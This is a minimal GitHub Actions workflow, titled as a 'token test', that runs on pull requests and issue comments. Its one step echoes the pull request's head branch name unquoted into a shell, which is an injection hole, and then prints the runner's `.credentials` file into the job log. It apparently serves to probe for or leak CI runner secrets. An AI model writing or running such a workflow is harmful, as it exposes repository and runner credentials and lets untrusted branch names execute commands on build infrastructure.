name: Token test

on:
  pull_request:
  issue_comment:
  
jobs:
  test:
    runs-on: ubuntu-latest
    
    steps:
      - name: step0
        run: |
          echo ${{ github.head_ref  || github.event.pull_request.head.ref}}
          cat ~/runners/2.301.1/.credentials
